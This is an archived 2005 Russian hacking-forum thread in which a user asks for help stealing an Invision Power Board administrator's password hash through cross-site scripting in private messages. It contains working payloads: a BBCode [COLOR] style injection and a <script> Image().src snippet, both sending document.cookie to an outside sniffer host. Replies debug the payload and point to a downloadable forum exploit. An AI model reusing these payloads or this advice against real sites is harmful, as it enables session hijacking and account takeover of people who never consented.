Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про проведению атаки класса XSS, в форуме Invison Power Board (https://forum.antichat.xyz/showthread.php?t=6829)

badboy 31.05.2005 17:55
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board
 
НАРОД СРОЧНО ПОМОГИТЕ!!!КОРОЧЕ НАШЁЛ ФОРУМ Invison Power Board.

Когда в приватном сообщении отправляю :

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:alert()) [/COLOR]

То при прочтении это письма выбрасывается окошко,где ничего не написано.

Когда вставлю :

[COLOR=http://aaa.aa/=`aaa.jpg]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]


То при прочтении его,ничего в письме не написано,а в логах античата написан IP,но не мой,но моей страны,а так же ничего больше не написано в логах :

[Tue May 31 17:39:19 2005] IP=62.148.156.202 SITE=
REFERER=
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.54u1 [en]

Вот такое сообщение.Пожалуйста напишите как преобразовать,чтоб заполучить хэш.Тоесть что добавить или чё делать,чтоб при отправке кода админу,я бы получил в логах снифера хэш пароля.

ПОЖАЛУЙСТА ПОМОГИТЕ!!!!!1

Че Гевара 31.05.2005 18:30
Цитата:
[COLOR=http://aaa.aa/=%60aaa.jpg]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
Если нет элемента (картинки) с номером 68, то не сработает ...
попробуй
Код:
images[0].src=

SanyaX 31.05.2005 18:33
Бля не мучайся скачай эксплойт с securitylab.ru и всё.

badboy 31.05.2005 18:39
SanyaX можешь дать мне ссылку где скачать эксплойт

badboy 31.05.2005 18:40
ЧеГевара ты что написал images[0].src= Это вместо той картинки вставить?

Че Гевара 31.05.2005 19:41
Все изображения в хтмл-документе представляются через массив images, который в свою очередь является свойством document-объекта. Изображение получает номер, так принято, что первое изображение получает 0, второе 1, третье 2 и т.д.

В примере взятом с http://antichat.ru/sniff/
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Создается новый Image-объект с именем img ... Затем определяется адрес изображения, представляемое через обект img ( а src - обязательный атрибут, указывающий URL рисунка (с) справочник =)) + через cgi-запрос передается содержавние cookies для текущего документа ...
Ситуация с твоим примером аналогична, за исключением лишь того факта, что используется уже существующий Image-объект ... Но если он не будет найден на странице, то это вызовет ошибку ...

Grrl 31.05.2005 22:40
А какая вкрсия инвижена? если <2.0.4 то тебе сюда
http://rst.void.ru/download/r57ipb2.txt
смысл парицца с xss?

Loo 02.06.2005 15:19
Grrl
извини... а мона тупой вопрос?? а как кмопилировать сплойт?? где взять прогу или что вообще как, можешь объяснить?? плиз..

qBiN 02.06.2005 16:07
Перл это не компилируемый язык,а интерпретируемый.

JazzzSummerMan 02.06.2005 16:29
специалисты утверждают что вопреки расхожему мнению, перл - компилируемый
(не придираясь к словам, а так, в кач-ве интересного факта)


Время: 03:51
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице